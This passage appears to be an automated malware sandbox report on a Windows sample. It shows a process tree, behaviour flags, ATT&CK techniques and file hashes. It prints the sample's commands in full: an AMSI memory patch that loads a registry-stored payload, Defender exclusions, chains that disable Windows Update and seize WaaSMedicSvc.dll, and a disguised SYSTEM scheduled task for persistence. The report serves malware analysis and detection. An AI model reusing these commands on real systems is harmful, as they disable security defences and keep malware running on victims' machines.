@([String])([IntPtr]);$FGmLxDhDEcOZoOpGstrfsN=owpfgqDwtXwS @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YOHaiUJyQqw=$swifuXmxvPTiB.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$aNYSxVdyYcvtsi=$IAknHmghFKplPy.Invoke($Null,@([Object]$YOHaiUJyQqw,[Object]('Load'+'LibraryA')));$WgidwqCpSaKwoSWJE=$IAknHmghFKplPy.Invoke($Null,@([Object]$YOHaiUJyQqw,[Object]('Vir'+'tual'+'Pro'+'tect')));$mXoliQF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aNYSxVdyYcvtsi,$sTvkclPIroMrynRftum).Invoke('a'+'m'+'si.dll');$TlSUIlWfBjHZtYFLP=$IAknHmghFKplPy.Invoke($Null,@([Object]$mXoliQF,[Object]('Ams'+'iSc'+'an'+'Buffer')));$mzDSpZANhp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WgidwqCpSaKwoSWJE,$FGmLxDhDEcOZoOpGstrfsN).Invoke($TlSUIlWfBjHZtYFLP,[uint32]8,4,[ref]$mzDSpZANhp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TlSUIlWfBjHZtYFLP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WgidwqCpSaKwoSWJE,$FGmLxDhDEcOZoOpGstrfsN).Invoke($TlSUIlWfBjHZtYFLP,[uint32]8,0x20,[ref]$mzDSpZANhp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3624

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1140

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1148

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1160

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1180

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1280

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1376

c:\windows\system32\sihost.exe
sihost.exe
2⤵
PID:2348

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1412

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1428

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1460

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s FontCache
1⤵
PID:1468

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1576

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1644

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1608

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1832

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1840

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1884

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1940

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1028

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:2052

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2136

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2836

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2696

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2652

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2644

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3016

C:\Users\Admin\AppData\Local\Temp\7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe
"C:\Users\Admin\AppData\Local\Temp\7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2600

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHkAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAawBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAZABkACMAPgA="
4⤵
- Suspicious use of WriteProcessMemory
PID:4024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHkAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAawBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAZABkACMAPgA="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3768

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:4224

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4252

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
PID:2312

C:\Windows\system32\sc.exe
sc stop bits
5⤵
PID:4164

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
PID:4808

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
PID:4404

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
PID:3536

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
5⤵
PID:3380

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
5⤵
PID:5012

C:\Windows\system32\sc.exe
sc config bits start= disabled
5⤵
PID:4716

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
5⤵
PID:3956

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
5⤵
PID:4256

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
5⤵
PID:1500

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
5⤵
PID:1392

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
5⤵
PID:3232

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
5⤵
PID:4508

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
5⤵
PID:4500

C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4520

C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4356

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
5⤵
PID:1784

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
5⤵
PID:824

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
PID:804

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
PID:708

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
PID:660

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
PID:412

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
5⤵
PID:4980

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
5⤵
PID:3700

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
5⤵
PID:1232

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
5⤵
PID:4308

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
5⤵
PID:3996

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:1664

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:4064

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:4312

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1552

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4796

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3548

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3444

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
4⤵
- Drops file in Windows directory
PID:2088

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:2948

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"
5⤵
- Creates scheduled task(s)
PID:60

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"
4⤵
PID:2120

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Suspicious use of SetWindowsHookEx
PID:4412

C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe
C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe
5⤵
- Executes dropped EXE
PID:4952

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"
6⤵
- Suspicious use of SetThreadContext
PID:400

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHkAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAawBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAZABkACMAPgA="
7⤵
PID:1824

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:2540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHkAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAawBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAZABkACMAPgA="
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4608

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
7⤵
PID:3768

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
- Suspicious use of SetWindowsHookEx
PID:2092

C:\Windows\system32\sc.exe
sc stop wuauserv
8⤵
PID:1232

C:\Windows\system32\sc.exe
sc stop bits
8⤵
PID:2792

C:\Windows\system32\sc.exe
sc stop dosvc
8⤵
PID:3536

C:\Windows\system32\sc.exe
sc stop UsoSvc
8⤵
PID:4336

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
8⤵
PID:4076

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
8⤵
PID:3488

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
8⤵
PID:3168

C:\Windows\system32\sc.exe
sc config bits start= disabled
8⤵
PID:804

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
8⤵
PID:1328

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
8⤵
PID:4292

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
8⤵
PID:956

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
8⤵
PID:4476

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
8⤵
PID:4348

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
8⤵
PID:3644

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
8⤵
PID:4856

C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4424

C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4952

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
8⤵
PID:308

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
8⤵
PID:2220

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
8⤵
PID:2300

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
8⤵
PID:4208

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
8⤵
PID:4036

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
8⤵
PID:4496

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
8⤵
PID:3896

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
8⤵
PID:2804

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
8⤵
PID:4380

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
8⤵
PID:4664

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
8⤵
PID:4116

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
8⤵
PID:2088

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
8⤵
PID:3760

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
7⤵
PID:4816

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:4148

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
8⤵
PID:3312

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
8⤵
PID:2124

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
8⤵
PID:3776

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
8⤵
PID:4016

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
7⤵
PID:4068

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "fuljhipnixrs"
8⤵
PID:2584

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2620

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2552

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:3132

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4892

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3772

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3772 -s 784
2⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3268

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4056

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3792

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3792 -s 856
2⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1668

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3792 -s 836
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:3696

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3472

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2468

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2460

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2356

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4004

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6E1.tmp.csv
Filesize
32KB

MD5
a97ad4686eed9bc1d95292d265a260e7

SHA1
be1ab1a2293d499360e81192a6b6ebd5f295b9ef

SHA256
0ed3164814690f3bc48097ac1acf1d4b415ec1a17d66953943a37a76e263796f

SHA512
0c293e24f61f308e342427744a13e5337905c3d77fb9cee57b398b2e09379447c06446e6b801e14d340be94b3f77153478642d157475b039a7c50c5e0c4263b8

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB730.tmp.txt
Filesize
12KB

MD5
61ea15241eb56c73f694d1c579330754

SHA1
ea1322b583cd78a7b67093f2af4f9b5c2cd0fcd0

SHA256
ed18bdbd15c560dec0b888f8cfdeec4b9c329b5d02d339333c52cb7e1404bfb6

SHA512
1fd464bca30346d6a6b1445aa56225ad1700d90d403c5a4b85d175681c540288b350e6d4521a52ba49c22e73794b203f9647d7111105abc4f16ca1737b337d89

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9C1.tmp.csv
Filesize
31KB

MD5
ead8c4998e3c2b6c5a8476f88007d2af

SHA1
f8afaf888711f0a3f7241a01a79ed2cccea60628

SHA256
